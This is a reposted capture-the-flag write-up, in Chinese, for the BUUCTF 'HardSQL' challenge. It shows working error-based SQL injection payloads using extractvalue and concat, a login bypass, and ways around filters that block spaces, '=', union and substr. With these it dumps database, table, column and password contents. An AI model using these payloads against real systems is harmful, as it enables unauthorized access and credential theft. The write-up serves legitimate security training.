ToB企服应用市场:ToB评测及商务社交产业平台

标题: 【BUUCTF】HardSQL [打印本页]
作者: 老婆出轨    时间: 2024-7-30 20:15
标题: 【BUUCTF】HardSQL
【BUUCTF】HardSQL

题目泉源

收录于:BUUCTF  极客大挑战 2019
题目描述

一道纯粹的SQL注入题

尝试进行注入,发现对以下字符进行了过滤:
  1. = %20(空格) %09 %0a %0b %0c %0d /**/ substr union by and
复制代码
且过滤方式不区分巨细写,检测到以上字符就die()
题解

先找注入点,由于空格被过滤,与空格起同样作用的字符也被过滤,因此我们使用(和)将库名、表名、字段名包裹起来,就不需要使用空格了。
exp 如下:
  1. ?username=-1'or(1)%23&password=1
复制代码

成功登录。
由于过滤了union,我们使用报错注入的方式进行尝试。另外,由于=被过滤,我们可以使用like来代替=。payload如下:
  1. //爆库名
  2. 1'or(extractvalue(1,concat(0x7e,(database()))))%23
  3. //爆表名
  4. 1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())))))%23
  5. //爆字段名
  6. 1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))%23
  7. //爆字段值
  8. 1'or(extractvalue(1,concat(0x7e,(select(group_concat(password))from(geek.H4rDsq1)))))%23
复制代码
在爆字段值的时间我们看到,flag只显示了一部分

由于substr()函数被过滤,我们使用left()或right()来进行字符串的截取,payload:
  1. 1'or(extractvalue(1,concat(0x7e,right((select(group_concat(password))from(geek.H4rDsq1)),30))))%23
复制代码
其中30是截取右边字符的个数,可以改为其他值,只要能拿到完整flag即可。

总结

绕过空格

使用以下字符替代空格,可以起到雷同效果
  1. %09 %0a %0b %0c %0d /**/
复制代码
或使用(和)包裹库名、表名、字段名,从而避免空格的使用,如:
  1. select(group_concat(table_name))from(information_schema.tables)where(table_schema)=(database())
复制代码
绕过 =

用like代替=
字符串显示不全

使用以下三个函数对字符串进行截取:
  1. substr()   left()   right()
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4